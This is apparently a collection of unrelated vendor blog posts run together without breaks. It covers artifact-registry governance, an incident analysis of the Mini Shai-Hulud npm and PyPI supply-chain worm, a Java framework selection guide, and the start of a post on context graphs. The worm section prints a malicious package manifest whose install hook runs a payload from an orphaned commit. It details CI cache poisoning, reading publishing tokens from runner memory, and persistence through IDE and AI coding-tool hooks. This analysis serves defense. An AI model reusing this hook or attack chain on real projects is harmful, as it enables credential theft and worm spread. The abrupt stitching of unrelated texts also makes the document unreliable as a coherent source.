The operational burden shows up in unexpected places. Onboarding a new service means provisioning credentials across multiple registries. Rotating secrets means updating pipelines in every repository that publishes or consumes artifacts. And when you need to answer "who pulled what and when" for a compliance audit, you're stitching together logs from disconnected systems with different formats and retention windows.
DevOps toolchain efficiency suffers because fragmented registries create artificial boundaries in automation workflows. Teams end up building brittle orchestration logic that breaks whenever registry APIs change or network partitions separate previously co-located systems.
Running workloads across on-premises data centres and multiple cloud providers amplifies every artifact sprawl problem. Each environment tends to accumulate its own preferred registries: Amazon ECR for AWS workloads, Google Artifact Registry for GCP services, a self-hosted Harbor instance in the data centre. What started as practical deployment choices hardens into infrastructure that's expensive to consolidate and risky to migrate.
Software delivery pipeline consistency becomes nearly impossible. A feature branch tested against artifacts from the on-prem registry might behave differently in production pulling from ECR because different proxy cache timing introduced a version skew. Compliance auditors asking for artifact lineage get stitched-together spreadsheets instead of queryable attestations because no single system has the full picture.
Registry consolidation doesn't mean forcing everything into one physical location. It means establishing a logical control plane that can proxy, cache, and govern artifacts regardless of where they're ultimately stored. The governance layer stays consistent even when artifacts need to live close to compute for latency or compliance reasons.
Harness Artifact Registry was designed to centralise artifact storage and enforce governance across engineering teams dealing with exactly these sprawl problems. It supports 16+ package types natively, including Docker, Helm, Maven, npm, PyPI, NuGet, Go, Cargo, Dart, Swift, RPM, Conda, Hugging Face (for ML models), and generic files, so teams don't need a separate registry for each language ecosystem.
Upstream proxy and caching is where consolidation starts in practice. Instead of every developer and CI job pulling directly from Docker Hub, Maven Central, PyPI, or npm, they pull through Harness AR's proxy layer. The proxy caches artifacts locally, so external registry downtime doesn't break your builds, and every fetch is subject to the same governance policies.
# Before: Direct pulls from multiple external registries
developer laptop --> Docker Hub
CI runner --> Maven Central
CI runner --> npm registry
CI runner --> PyPI
# After: Everything routes through Harness AR upstream proxies
developer laptop --> Harness AR (Docker proxy) --> Docker Hub
CI runner --> Harness AR (Maven proxy) --> Maven Central
CI runner --> Harness AR (npm proxy) --> npm registry
CI runner --> Harness AR (Python proxy) --> PyPIUpstream proxies are available for all 16+ supported package types, so the governance boundary is genuinely universal rather than limited to containers.
The Dependency Firewall gates what enters your registry from upstream sources. Currently, OPA policies apply only to artifacts fetched through upstream proxies. Direct pushes to hosted registries are not yet subject to Dependency Firewall policies; that capability is coming soon.
For now, governance for direct pushes relies on Security Tests policy sets (Docker/Helm only) or post-ingestion scanning via STO/SCS. There are some built-in policy templates that cover the most common scenarios:
Each evaluation results in one of three statuses: Passed, Warning, or Blocked. Blocked artifacts are never cached in your registry. You can write custom Rego policies beyond the built-in templates.
# Example: Block any npm package published less than 7 days ago
package artifact
deny[msg] {
input.metadata.published_days_ago < 7
msg := sprintf("Package %s was published %d days ago (minimum: 7)",
[input.metadata.name, input.metadata.published_days_ago])
}
Currently, the Dependency Firewall's OPA policies apply to upstream proxy fetches. Support for applying these policies across all registry types, including direct pushes to hosted registries, is coming soon.
Role-based access control provides three pre-built roles (Viewer, Contributor, Admin) that can be assigned to users, user groups, or service accounts at the registry level.
Security scanning and quarantine work through two layers. First, the Dependency Firewall evaluates upstream artifacts against OPA policies at fetch time, blocking anything that fails before it ever enters your registry. Second, for artifacts already in the registry, Harness integrates with Security Testing Orchestration (STO) and Supply Chain Security (SCS) to scan for vulnerabilities and generate SBOMs. Registries can be configured with Security Tests policy sets that evaluate artifacts during ingestion via a scan pipeline (currently supported for Docker and Helm registries). Artifacts that violate policies are automatically quarantined, preventing them from being pulled or used in any downstream pipeline. This requires enabling the relevant policy configuration on your registry.
Quarantine can also be applied manually through the UI on any artifact (three-dot menu > Quarantine), with a required reason for audit purposes. Quarantined artifacts can be released via "Remove from Quarantine" once the issue is resolved.

The artifact details page surfaces security and deployment data directly:
Audit trails are built into the Harness platform. Every artifact action is tracked with the actor, timestamp, and context. You can query these via the UI (Account Settings > Audit Trail, filter by Artifact Registry) or the API.
Teams serious about software supply chain governance end up implementing these controls eventually. Harness AR packages upstream proxy caching, Dependency Firewall, RBAC, security scanning via STO/SCS, and platform-wide audit trails into a single registry that covers the breadth of package types modern engineering teams actually use. The alternative is maintaining a constellation of registry-specific integrations that break whenever vendors deprecate APIs or security requirements tighten.
You can explore the platform or review implementation patterns in the Artifact Registry documentation.
Fixing artifact repository sprawl doesn't require ripping out every existing registry overnight. It requires establishing a control plane that can answer basic questions reliably: what artifacts exist, where they came from, who has access, and what depends on them. Once you have that visibility, you can start enforcing policies consistently and eliminating redundant tooling incrementally.
The teams that move fastest at scale treat artifact management as infrastructure that enables speed rather than a storage problem that needs solving registry by registry. They consolidate governance boundaries, route external dependencies through proxy layers with policy enforcement, and build confidence that what passed security checks is actually what reached production.
If your deployment pipelines feel slower than they should, or your security team struggles to answer supply chain questions confidently, artifact sprawl is worth examining. The operational debt compounds quietly until it doesn't, usually during an incident when you need answers fast and discover your artifact lineage spans five disconnected systems with inconsistent audit logs.
No. Start with upstream proxies (no migration needed), then migrate hosted artifacts incrementally per team/package type.
Harness AR can proxy Artifactory as an upstream source while you migrate, or coexist indefinitely if you need Artifactory-specific features.
No. Harness AR works with any CI/CD tool that can authenticate to a registry. The integrations with Harness CD/STO/SCS are optional add-ons.


Shai-Hulud is back - this time being lighter, faster and more automated than before. This new wave, termed as Mini Shai-Hulud, has affected a number of packages from tanstack, uipath, opensearch-project and mistralai among others over the past few weeks, with the latest series of major compromises coming on 19th May, 2026 on major organizations openclaw-cn and antv.
Check an extensive list of affected packages here. This self-propagating software supply-chain worm compromised legitimate high-profile packages with millions of weekly downloads, significantly increasing the potential blast radius. This article details the technical workings, sophisticated propagation mechanism and remediation of this supply-chain attack.
Open-source ecosystems operate on trust. Modern applications routinely pull hundreds of third-party dependencies during development and deployment, often through fully automated CI/CD pipelines. This creates a trust chain as shown below.

Though efficient, this model creates a vast attack surface. Compromising any link in the chain allows attackers to distribute malicious code as a "trusted" update. This is the core idea behind software supply-chain attacks.
In brief, this malware was designed to execute automatically during npm package installation, harvest sensitive credentials from developer systems and CI/CD environments and abuse stolen publishing credentials to release additional malicious package versions. This worm-like propagation mechanism allowed the attack to spread rapidly through trusted package maintainers and automated release pipelines.
What made Mini Shai-Hulud technically more advanced than before was:
The malware propagated through stolen maintainer tokens, GitHub sessions, CI secrets, publishing credentials and developer machines. So once enough maintainers and CI pipelines were infected, the worm jumped laterally across ecosystems. This compromised package managers like npm and PyPI with RubyGems also facing a similar attack chain, making the campaign a distributed ecosystem-wide compromise rather than a single-point attack, leading to no single “ground zero” for Mini Shai-Hulud.
The decentralized and self-propagating nature of the attack also made containment significantly harder as the malware continuously resurfaced through multiple compromised maintainers, registries and CI/CD entry points even weeks after the initial wave, with new exploitation chains still being identified as late as 19th May, 2026. One of the most impactful compromises of the wave, however, emerged through the TanStack attack chain on 11th May, 2026.
September 2025 - The original Shai-Hulud worm hits npm, compromising 200+ packages. The first time a supply chain attack runs fully automatically, no human is needed after the initial launch.
December 2025 - An updated version (Shai-Hulud 2.0) appears. Faster, broader and starts hitting maintainers from well-known projects like Zapier and Postman.
March 31, 2026 - The axios package gets compromised. One of the most downloaded npm packages in existence. Attackers hijack a maintainer account and sneak in a hidden dependency that runs a malicious script on install. CISA issues an official advisory.
April 29, 2026 - Mini Shai-Hulud emerges, this time targeting SAP's developer ecosystem. Four core SAP packages are poisoned for a few hours. Over 1,000 developers unknowingly hand over their credentials before the packages are pulled.
May 11-12, 2026 - The big one. 172 packages were compromised in 48 hours across npm and PyPI simultaneously. TanStack, Mistral AI, UiPath, OpenSearch are all hit. For the first time, the malicious packages pass provenance verification, meaning even teams doing everything right got affected.
May 12, 2026 - On the same day, RubyGems gets flooded with 500+ malicious packages via bot accounts. New registrations suspended. Everything yanked within 24 hours, but the message is clear: No registry is safe.
May 19, 2026 - The campaign resurfaces again compromising 300+ additional npm packages, including the AntV ecosystem and packages from OpenClaw-CN. The newer variants expanded persistence, stealth and propagation capabilities through GitHub-based fallback C2.
Instead of directly uploading malware to npm using stolen maintainer credentials, the attackers reportedly abused the dangerous pull_request_target trigger. GitHub cache served as the medium for malware delivery. The compromise here occurred at the CI/CD infrastructure layer rather than through a visible malicious commit. Let’s understand the exploit step-by-step.
The attack began from a malicious fork named voicproducoes/router (now deleted), where the attacker pushed an orphaned commit 79ac49eedf774dd4b0cfa308722bc463cfe5885c into the forked tanstack/router repository. The commit itself introduced only two files:
{
"name": "@tanstack/setup",
"version": "1.0.0",
"scripts": {
"prepare": "bun run tanstack_runner.js && exit 1"
},
"dependencies": {
"bun": "^1.3.13"
}
}
As we can see, the prepare lifecycle hook runs the payload using bun, thus implying that whenever the package @tanstack/setup would be installed, the payload would automatically be executed.
Now, the attacker opened a malicious pull request #7378 to tanstack/router from another forked repository named zblgg/configuration, triggering the CI workflows of the base repository. The vulnerable workflow among them was bundle-size.yml, which used the dangerous pull_request_target trigger, causing it to run with access to the base repository’s permissions, caches and GitHub Actions identity. The malicious PR contained a seemingly innocent file addition named packages/history/vite_setup.mjs, which maliciously modified the pnpm dependency store inside the GitHub Actions runner during workflow execution.

Upon workflow completion, actions/cache automatically uploaded the poisoned pnpm store to the shared repository cache. To ensure this malicious entry remained the the newest valid cache entry, the attacker repeatedly pushed updates to the PR branch. Finally, the attacker force-pushed the PR branch back to match the main branch HEAD, leaving no visible changes in the PR to hide traces.
Since GitHub Actions caches are shared across workflows, poisoned artifacts created during the attacker-controlled workflow execution were later restored inside TanStack’s legitimate release workflow defined by release.yml. The attacker’s payload gained execution and extracted GitHub Actions OIDC authentication tokens directly from the runner’s process memory using /proc/<pid>/mem access techniques.
The payload from the poisoned cache then formed the malicious packages by doing the following 2 things:
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
Finally, the trusted yet compromised workflow itself requested valid short-lived npm publishing tokens and published malicious releases directly through the official TanStack CI/CD pipeline, thus carrying valid provenance attestations.
Design of the malicious package ensured that every installation of the affected TanStack package silently fetched the orphaned commit and executed tanstack_runner.js during installation on developer machines and CI runners. This combined with the obfuscated payload in router_init.js containing sophisticated multi-stage credential stealer with persistence, exfiltration and self-destruction capabilities. This led to harvesting credentials from developer machines, GitHub Actions runners’ memory and enterprise CI/CD environments by scanning environment variables, configuration files and cloud credentials among other things.
It also attempted persistence through IDE hooks, VS Code extensions, Claude Code integrations and background services while exfiltrating stolen secrets through Session Protocol CDN or GitHub GraphQL APIs. Finally, upon discovering tokens with package publishing access, the code automatically published additional compromised packages containing the same router_init.js payload and optionalDependencies chain, enabling Mini Shai-Hulud to self-propagate across npm, PyPI and other software ecosystems. Together, this formed the Mini Shai-Hulud worm.
Attacker creates malicious fork (zblgg/configuration)
↓
PR #7378 opened using pull_request_target workflow
↓
Workflow checks out attacker-controlled PR code
↓
Malicious code modifies pnpm dependency store
↓
actions/cache saves poisoned cache to repository cache
↓
Legitimate maintainer later merges normal PR to main
↓
Trusted release workflow restores poisoned pnpm cache
↓
Attacker-injected binaries execute inside official CI runner
↓
Malicious package with router_init.js and optionalDependencies published
↓
Package installed and npm install is run
↓
prepare hook executes for tanstack/setup
↓
tanstack_runner.js executes from orphaned commit
↓
router_init.js is unpacked and triggered
↓
Environment fingerprinting + token discovery
↓
Credential harvesting + exfiltration
↓
More malicious packages released with Mini Shai-Hulud Payload
The TanStack attack wasn't alone. On the same day, RubyGems was hit by a separate campaign with 120+ malicious packages uploading SSH keys, API tokens and credentials on install. The incident demonstrated that Mini Shai-Hulud was no longer an npm-only threat but an ecosystem-level supply-chain worm capable of moving laterally across package registries and CI/CD trust boundaries.
RubyGems temporarily suspended new account registrations after hundreds of malicious gems were uploaded through automated bot accounts in a coordinated supply-chain attack. Researchers observed that many of the malicious gems contained credential-stealing functionality targeting developer machines, CI/CD pipelines and cloud environments similar to the npm or PyPI campaigns. Unlike the TanStack compromise where attackers weaponized trusted publishing infrastructure, the RubyGems wave appeared more focused on large-scale registry flooding and ecosystem poisoning using automated account creation and stolen credentials.
The npm and PyPI attack was precise with a worm spreading quietly through stolen tokens, targeting specific maintainers with valid provenance to avoid detection. The RubyGems attack was blunt with mass account creation, bulk uploads, live exploits and stolen credentials routed to ransomware groups within hours. However, both incidents followed the common principle of compromising developer infrastructure, stealing secrets and expanding propagation into additional software ecosystems. Two different attack methods, same motive.
Mini Shai-Hulud proves that perimeter defenses fail when attackers exploit trusted pipelines and developer tools. To mitigate such ecosystem compromises, organizations must integrate secure coding, hardened releases and continuous software monitoring. The following mitigation steps should be followed:
According to Harness’s analysis of the npm attacks, organizations should treat CI/CD pipelines as critical security infrastructure, combining SBOM visibility, policy enforcement, provenance validation and automated dependency risk analysis to prevent trusted publishing systems from becoming malware distribution channels. Read more about it here.
Harness SCS helps you quickly detect and contain compromised dependencies like the TanStack package before they impact your pipelines. With real-time visibility into your SBOMs and dependency graph, you can identify affected versions, trace their usage across builds and environments and block them using OPA policies. This ensures malicious packages never propagate through your CI/CD or AI workflows.
Harness SCS enables instant search across all repositories and artifacts to quickly identify if compromised package versions exist in your environment. The moment such a malicious package is disclosed, you can pinpoint its presence and assess impact across your entire supply chain in seconds.

Harness AI streamlines response to incidents like the TanStack compromise through simple natural-language prompts. With a single prompt, you can generate OPA policies to block affected versions of TanStack, for example, across all pipelines, preventing malicious packages from entering builds or deployments. As new compromised versions emerge, these policies can be quickly updated to maintain strong preventive controls across your SDLC. SCS customers can use this OPA policy to detect and block the affected versions
Harness SCS automatically detects compromised versions across both production and non-production environments. Teams can track remediation, assign fixes and monitor progress through to deployment, ensuring exposed credentials and vulnerable dependencies are addressed quickly. This end-to-end visibility helps contain the impact and prevents compromised packages from persisting in your supply chain.

The Mini Shai-Hulud worm highlights how quickly a malicious package can expose high-value secrets when embedded deep within registries and CI runners. Given its role in managing dependencies and packages across projects, the impact extends beyond code to API keys, prompt data and downstream systems, often bypassing traditional security checks.
Defending against such attacks requires more than reactive fixes. Teams need real-time visibility into dependencies, the ability to enforce policies to block compromised versions and continuous tracking to ensure remediation is complete across all environments. Harness SCS enables teams to quickly identify where affected package versions are used, prevent them from entering new builds and ensure fixes are consistently rolled out.
With these controls in place, organizations can limit credential exposure, contain threats early and secure their supply chain against attacks like the TanStack compromise.


When you're architecting an enterprise Java application, one decision quietly shapes everything downstream: runtime footprint, deployment pipelines, and how your platform team handles incidents at 3 a.m. For two decades, that decision was framed as Java SE vs Java EE. In 2026, that framing has quietly inverted.
Nearly every modern enterprise Java app runs on Java SE 21 or 25 LTS. The real choice now sits one layer up: which framework or runtime sits on top of the JVM. Spring Boot. Quarkus. Helidon. Micronaut. Vanilla Jakarta EE on Open Liberty, Payara, or WildFly. These options have converged on the same underlying APIs. Spring Boot 3 and 4 sit on jakarta.* packages, the same namespace Jakarta EE itself uses. But they differ sharply in startup time, memory footprint, deployment topology, and what your CI/CD pipeline has to do to ship them safely.
This guide is for the platform engineer, architect, or staff engineer who needs to make that call once and live with it across dozens of services. We'll cover what changed, where the stacks still diverge, and how to standardize delivery across a mixed Java fleet without forcing consolidation no team wants.
Java SE (Standard Edition) is the foundation of every Java application, from a five-line script to a globally distributed system. It's the language, the runtime, and the core libraries every Java program assumes is there.
But describing Java SE as just "the foundation" undersells what's happened to it in the last three years. Java SE in 2026 is not the Java SE of 2018.
At its core, Java SE includes:
These pieces form the runtime baseline that every Java framework, including Spring Boot, Quarkus, and Jakarta EE implementations, sits on top of.
If you've been away from the platform for a few years, four changes are worth knowing about before you make any architectural decisions:
Virtual threads (stable in Java 21). Project Loom collapsed the cost of a thread from megabytes of stack to a few hundred bytes. A single JVM can now run millions of concurrent virtual threads. This is the biggest concurrency change in Java's history and it removes the main argument for reactive frameworks like WebFlux on most workloads. Blocking code is fast again.
AOT compilation and native images. GraalVM native image and the JDK's own ahead-of-time caching turn Java apps into binaries that start in tens of milliseconds and use a fraction of the memory of a warm JVM. This used to be a Quarkus or Micronaut differentiator. It's now table stakes across the ecosystem, including Spring Boot 3+.
Records, sealed classes, and pattern matching. The boilerplate that used to push teams toward Lombok or Kotlin is mostly gone. Data-oriented programming in modern Java looks closer to Scala or Kotlin than to Java 8.
Java 25 LTS performance work. Compact object headers shrink object overhead by roughly 22% on heap-heavy workloads. The G1 garbage collector got a redesigned card table in Java 26 that delivers measurable throughput gains on reference-heavy code.
Plain Java SE is honest about its scope. It does not give you:
You can build all of these by hand. Almost no one does. In practice, "I'm using Java SE" in 2026 means "I'm using Java SE plus a framework that supplies the missing pieces." That framework is the actual decision, which is where the rest of this guide focuses.
Jakarta EE is the modern successor to Java EE, the standardized set of APIs and specifications for building enterprise-scale Java applications. If you wrote enterprise Java between 2000 and 2017, you wrote Java EE. Everything since 2018 is Jakarta EE.
The name change wasn't cosmetic. It came with a migration that every Java team upgrading in 2026 still has to plan for.
Oracle transferred Java EE to the Eclipse Foundation in 2017. The platform was renamed Jakarta EE because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under new governance.
Then came the breaking change. Starting with Jakarta EE 9 (2020), every package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. The change was mechanical, but it touched every file in every Jakarta EE codebase on the planet, and it forced every framework that depended on those APIs to publish a major-version break.
This is why Spring Boot 3 (late 2022) was a hard upgrade. Spring Boot 3 dropped javax.* and adopted jakarta.*. Any Spring Boot 2.x application moving to 3.x or 4.x has to migrate the namespace. Tools like Eclipse Transformer and OpenRewrite automate most of it, but the migration is still the gating event for many platform upgrades happening in 2026.
Jakarta EE 11, released in 2025, is the current stable platform. Jakarta EE 12 is in development. The headline specifications most teams interact with are:
If you're a Spring developer, several of these will look familiar. That's not coincidence. Spring's annotations and patterns shaped Jakarta EE's modernization, and Jakarta EE's specifications now define the underlying APIs Spring builds on. The two ecosystems converged.
A common objection to Jakarta EE is that it's too heavy for microservices. Jakarta EE 10 answered this directly with the Core Profile: a minimal subset of specifications (CDI Lite, JAX-RS, JSON-P, JSON-B, Annotations, Interceptors, Dependency Injection) explicitly designed for lightweight cloud-native runtimes and AOT compilation.
The Core Profile is what runtimes like Quarkus implement when they want Jakarta EE compatibility without the full platform's footprint. It's the answer to "Jakarta EE doesn't fit in a container." It does. The original critique was about WebSphere and WebLogic, not about Jakarta EE the specification.
In 2026, picking Jakarta EE doesn't mean picking a multi-gigabyte application server. The runtimes teams actually choose are:
The legacy "heavyweight Java EE" stereotype belongs to WebSphere full profile and WebLogic. Those are real products with real footprints, but in 2026 they're an active migration target, not a forward choice for new development.

Figure: Modern enterprise Java is a layered stack. Frameworks and runtimes pick their packaging and opinions, but they all sit on the same jakarta.* API surface and the same JVM.
By this point in the article, the framing should be obvious: Spring Boot, Quarkus, Helidon, Micronaut, and vanilla Jakarta EE on Open Liberty or Payara are not five different platforms. They're five different opinions sitting on the same jakarta.* APIs and the same JVM. So how do teams actually decide?
In practice, four signals do most of the work.
Signal 1: What does the rest of your fleet run?
The single biggest predictor of which stack a new service uses is which stack the team's other services already use. This is not laziness. It's a sound platform decision. Two services on the same framework share build tooling, base container images, observability libraries, configuration patterns, deployment templates, and on-call runbooks. A team running 40 Spring Boot services will pay a real operational tax to introduce a Quarkus service, even if Quarkus is technically the better fit for that one workload.
The exception is when the new workload has a specific profile that the existing stack genuinely can't serve well. A Spring Boot shop building one event-driven function that needs to scale to zero on AWS Lambda has a legitimate reason to reach for Quarkus or a native Spring Boot image. A Jakarta EE shop building one async data-processing service has a legitimate reason to reach for Spring Boot's mature integration ecosystem. The decision rule is not "best tool for the job in isolation," it's "best tool given what we already operate."
Signal 2: What's the deployment target?
The deployment target matters more than most architecture discussions admit. Three patterns dominate:
Signal 3: What's the team's reactive vs imperative bias?
Five years ago, this was a religious debate. Virtual threads have mostly settled it for new code. But existing services that are already reactive don't get a free migration, and teams that have built fluency with Project Reactor, RxJava, or Mutiny will keep getting value from those investments.
The practical guidance:
Signal 4: How much governance do you need?
This is the question that quietly distinguishes Jakarta EE from Spring Boot in regulated environments. Jakarta EE is a specification with multiple compatible implementations. A regulated bank or insurer can require "any Jakarta EE 11 compatible runtime" in a procurement document and have meaningful vendor portability. Spring Boot is a single implementation, governed by VMware. That's fine for most teams. It's a real consideration for organizations with compliance requirements around vendor lock-in.
Quarkus, Helidon, and Open Liberty all sit on the Jakarta EE side of this line because they implement Jakarta EE specifications. Spring Boot does not, despite using jakarta.* packages. The distinction matters less than it used to, but it has not gone away.
The takeaway
The convergence at the API layer means most teams can pick any of these stacks and ship perfectly good software. The choice is no longer a technology bet. It's a fit-to-fleet, fit-to-deployment-target, and fit-to-governance-model decision. The teams that get this wrong are the ones still litigating it as a technology choice.
Stack choice does not end at deployment. It shapes how your services emit telemetry, how incidents propagate, and how quickly your platform team can pin down the root cause when something breaks at 2 a.m. The convergence story makes parts of this easier (shared APIs mean shared observability standards) and parts of it harder (mixed fleets mean more surface area for incidents to hide in).
Three operational realities worth thinking through.
The 2026 platform team rarely operates a single-framework fleet. Most enterprise Java estates look like this: a long tail of Spring Boot services, a growing edge of Quarkus or native-compiled services for cold-start-sensitive workloads, and a stable core of older Jakarta EE applications running on Open Liberty, Payara, or WildFly. Sometimes a few WebLogic or WebSphere systems are still in active modernization.
This mix is fine. It reflects real organizational decisions made over time. But it means your reliability strategy cannot assume framework homogeneity. Health endpoint conventions, log formats, metric names, and tracing instrumentation differ across these stacks unless you actively unify them. The teams that struggle most with incident response are the ones who let each service team pick its own conventions.
OpenTelemetry has become the cross-stack standard for traces, metrics, and logs in enterprise Java. Spring Boot, Quarkus, Helidon, Micronaut, and most Jakarta EE runtimes all ship with OpenTelemetry instrumentation either built-in or one dependency away. This is genuinely good news for platform teams.
The catch: standardization at the protocol layer does not give you standardization at the convention layer. Two services emitting OpenTelemetry traces can still tag spans with completely different attribute names. Two services emitting metrics can still use different naming conventions for the same operation. AI SRE platforms perform best when the signals they ingest are semantically consistent. That consistency is a platform-engineering decision, not a framework decision.
The practical guidance: pick a single OpenTelemetry semantic convention (the OTel HTTP and database conventions are reasonable defaults) and enforce it across stacks through your shared observability libraries. The framework choice does not matter as much as whether you've made the convention choice at all.
A typical Spring Boot service on the JVM takes 2 to 5 seconds to start, hits steady-state CPU and memory after another 30 to 60 seconds of JIT warmup, and produces meaningful traces and metrics throughout. A Quarkus native binary starts in under 100 milliseconds and reaches steady state immediately. These are different operational profiles. They produce different incident patterns.
Spring Boot deployments tend to fail visibly during startup or warmup. Native deployments tend to fail at build time or never. Spring Boot scaling events are slower and more forgiving. Native scaling events are faster but more brittle when something is wrong with the binary itself. AI SRE platforms detect anomalies based on baselines, and your baselines should reflect the runtime profile of the service being monitored. A 3-second startup that is normal for a JVM service is a critical anomaly for a native service.
This is where AI SRE platforms like Harness AI SRE become operationally meaningful. In a single-framework fleet, a senior SRE can mostly hold the operational model in their head. In a mixed fleet of 50 to 500 services across Spring Boot, Quarkus, and legacy Jakarta EE, no human can. The questions AI SRE answers well are exactly the questions mixed-fleet teams ask:
These questions are tractable for AI when the underlying telemetry is consistent. They are intractable for humans regardless of telemetry quality. That's the operational case for treating AI SRE as platform infrastructure rather than as a tool individual teams adopt.
The framework choice shapes the data. The platform decision is what you do with it.
See how Harness AI SRE correlates incidents across mixed Java fleets.
The honest answer to "which Java stack should we use" depends on what you're building, what you already operate, and what your deployment target looks like. The matrix below is opinionated and concrete. Use it as a starting point, not a final answer.
Choose when:
Avoid when:
Current version baseline: Spring Boot 4.0 (released late 2025), running on Java 21 or 25 LTS. Spring Boot 3.x remains a reasonable choice for teams not ready to upgrade Spring Framework to 7.
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Neither of these is a forward choice in 2026. Both are real products with real production footprints, but new development on them is rare outside very specific enterprise circumstances. If you're running WebSphere full profile or WebLogic, the relevant question is the modernization path: typically Open Liberty (the IBM-supported migration target from WebSphere) or Helidon and WildFly (common WebLogic migration targets).
If you've read this far and the matrix still feels like five reasonable options, default to one of two answers:
For everything else, the matrix above is a tiebreaker. The decision rule that beats every other rule is: pick the framework your platform team can operate well at 2 a.m.
The article has been pushing toward one conclusion: in 2026, most enterprise Java estates are mixed-framework by design, and the platform team's job is to make that mix operable rather than to force consolidation.
What that looks like concretely:
A Spring Boot core handles the long tail of CRUD services and customer-facing APIs. A handful of Quarkus or native Spring Boot services sit at the edges where cold start matters: serverless functions, event handlers, scale-to-zero workloads. A stable set of Jakarta EE applications on Open Liberty or Payara handles the deeply-integrated systems that have been running reliably for years and would cost more to rewrite than to maintain. Java 21 is the floor across all of it, with a planned migration to Java 25 LTS over the next 12 to 18 months.
This is not an architectural compromise. It is the correct answer for organizations that have grown over time and have services with genuinely different operational profiles. The mistake is treating the mix as a problem to solve rather than an environment to operate.
When a team proposes adding a new service to the fleet, four questions separate good decisions from defaults:
These questions matter more than any framework comparison because they're the questions a senior platform engineer asks before writing the first line of code. The frameworks themselves have converged enough that the operational fit dominates the technical fit.
The four questions at the end of the previous section all point at the same operational problem. A platform team running a mixed-framework Java fleet faces the same delivery bottleneck regardless of which frameworks are in the mix: ticket-ops and pipeline sprawl that compound with every new service.
The frameworks have converged. The pipelines have not. Most enterprise Java teams still operate one CI/CD configuration for Spring Boot, a different one for Quarkus, a third for Jakarta EE on Open Liberty or Payara, and a long tail of bespoke automation for whatever legacy systems are still in flight. Every new service adds operational surface area. Every framework upgrade creates a coordination problem.
This is the layer where AI-powered continuous delivery and GitOps practices stop being aspirational and become structural. Pull-based deployments through GitOps eliminate the manual approval steps that previously gated Spring Boot rollouts but not Quarkus ones. Policy as Code guardrails enforce the same release strategies, security requirements, and resource limits across every framework in the fleet. Automated verification catches deployment anomalies against each service's own baseline, whether that baseline is a 3-second JVM startup or a 50-millisecond native cold start. Intelligent rollbacks protect production without requiring on-call engineers to remember which framework needs which recovery playbook.
The platform decision is no longer which Java framework to standardize on. It's how to operate the mix you already have without paying a coordination tax on every change.
Java SE is the language, JVM, and core libraries every Java application runs on. Jakarta EE is a set of standardized APIs (CDI, Jakarta Persistence, Jakarta REST, Servlet, Jakarta Data, and others) that extend Java SE for enterprise applications. In 2026, the choice is rarely between Java SE and Jakarta EE directly. It's between frameworks and runtimes (Spring Boot, Quarkus, Helidon, Micronaut, Open Liberty, Payara, WildFly) that all sit on Java SE and most of which implement or interoperate with the Jakarta EE specifications.
Jakarta EE is the direct successor to Java EE under new governance at the Eclipse Foundation. Oracle transferred Java EE to Eclipse in 2017 and the platform was renamed because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under the new name. Jakarta EE 11 (2025) is the current stable version.
Starting with Jakarta EE 9 in 2020, every Jakarta EE package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. Spring Boot 3 (late 2022) and Spring Boot 4 both require the new namespace, which means any Spring Boot 2.x application upgrading to 3.x has to migrate every affected import. Tools like Eclipse Transformer and OpenRewrite automate most of the migration, but it remains the gating event for many platform upgrades happening in 2026.
For most greenfield services, Spring Boot is the path of least resistance because of its ecosystem and hiring advantages. Choose a Jakarta EE runtime like Quarkus when cold start time and memory footprint are your dominant operational costs, when you need native compilation as a first-class concern, or when procurement requires multi-vendor specification compatibility. The technical capabilities have largely converged. The decision is mostly about ecosystem fit, deployment target, and what your platform team already operates well.
On the JVM, a typical Spring Boot service starts in 2 to 5 seconds and runs in 200 to 400 MB, while a Quarkus service starts closer to 1 second and runs in 150 to 250 MB. As GraalVM native binaries, both Spring Boot (via Spring AOT) and Quarkus start in 30 to 100 milliseconds and run in 30 to 80 MB. The real performance difference shows up in cold-start-sensitive deployments like serverless and scale-to-zero workloads, where native compilation moves from a nice-to-have to a requirement.
Java 21 LTS is the production baseline for most enterprise Java fleets, and Java 25 LTS (released September 2025) is what platform teams are migrating to over the next 12 to 18 months. Java 17 should be treated as the floor, not the target. Avoid non-LTS releases (currently Java 26) for production unless you have a specific reason to track preview features, since support windows for non-LTS versions are six months. Both Spring Boot 4 and Jakarta EE 11 support Java 21 with first-class enhancements when running on Java 25.
Yes, and most enterprise Java fleets do exactly this. The technical compatibility is straightforward because both stacks produce standard container images and both expose health, metrics, and logs through OpenTelemetry-compatible instrumentation. The harder problem is operational consistency: enforcing the same release strategies, observability conventions, and governance policies across both stacks. Policy-as-code and unified delivery pipelines solve this regardless of which frameworks are in the mix.
Java EE under that name ended in 2017, but the platform is alive and actively developed under the Jakarta EE name at the Eclipse Foundation. Jakarta EE 11 shipped in 2025 with new specifications including Jakarta Data and first-class virtual thread support. Modern runtimes like Quarkus, Helidon, Open Liberty, Payara, and WildFly implement Jakarta EE specifications in cloud-native form. The "Java EE is dead" narrative was specifically about heavyweight application servers like WebLogic and WebSphere full profile, which are an active migration target rather than a forward choice.
Experience AI-powered continuous delivery and native GitOps with Harness


Engineers have been shipping pieces of "the graph" for years. Service maps. Dependency graphs. Knowledge graphs. RDF triples. The newest entrant is the context graph, and the reason it shows up now is specific: software is increasingly executed by agents, and agents need a model of how work actually happens, not just an index of what exists.
This post is a practical, vendor-neutral walkthrough of context graphs: what they are, what separates them from a knowledge graph, the components you'll end up building, and the pitfalls that bite teams who try to ship one. I'll be drawing on engineering writing from Glean and Harness where they've published useful frames, but the design decisions apply regardless of stack.
A knowledge graph answers questions about state. What services exist. Which team owns which repo. Which ticket is linked to which incident. The graph is a snapshot of relationships at a point in time.
A context graph answers a different question. How does work flow through this organization? When a P1 fires, what sequence of actions usually resolves it? When a deal moves from "pilot created" to "closed-won," what steps are between those states, who runs them, and how long do they take? When a service hits an error rate threshold, what's the typical path from alert to mitigation?
